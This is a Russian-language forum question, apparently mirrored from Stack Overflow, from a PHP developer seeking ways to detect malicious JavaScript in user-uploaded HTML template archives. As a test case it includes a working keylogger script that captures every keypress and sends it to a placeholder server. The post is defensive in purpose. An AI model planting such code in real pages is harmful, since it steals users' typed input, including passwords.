Обнаружение вредоносного сценария возможной угрозы безопасности для файлов html и js [закрыто] ⇐ Linux

[Anonymous]

Я разрешаю пользователям загружать сжатые HTML-шаблоны на веб-сайт, который я разрабатываю с помощью php. ZIP-архив содержит файлы HTML и ресурсы (файлы Javascript, файлы CSS и изображения).
Я хочу получить анализ безопасности на предмет возможных вредоносных js-скриптов или частей кода. Например: кейлоггер отправляет нажатия клавиш на сайт возможного злоумышленника и т. д.
Я попробовал заархивировать их и проверить с помощью Virustotal, Hybrid Analysis и других сервисов, в результате чего получился чистый zip-файл. Я был бы очень признателен, если бы вы предложили мне или порекомендовали какой-либо сервис для обнаружения вредоносных частей js-кода или js-файлов.
Текущий html-файл для тестирования вредоносного кода





Keystroke Logger Test


Keystroke Logger Test
Start typing to see keystrokes logged and sent to the server.




js file-logger.js
// URL of the remote server to send keystrokes to
const serverUrl = 'https://example.com/log-keystrokes';

// Function to send keystroke data to the server
function sendKeystroke(key) {
fetch(serverUrl, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify({ key: key, timestamp: new Date().toISOString() }),
})
.then(response => response.json())
.then(data => {
console.log('Success:', data);
})
.catch((error) => {
console.error('Error:', error);
});
}

document.addEventListener('keydown', function(event) {
console.log('Key pressed: ', event.key);
sendKeystroke(event.key);
});



Подробнее здесь: https://stackoverflow.com/questions/787 ... d-js-files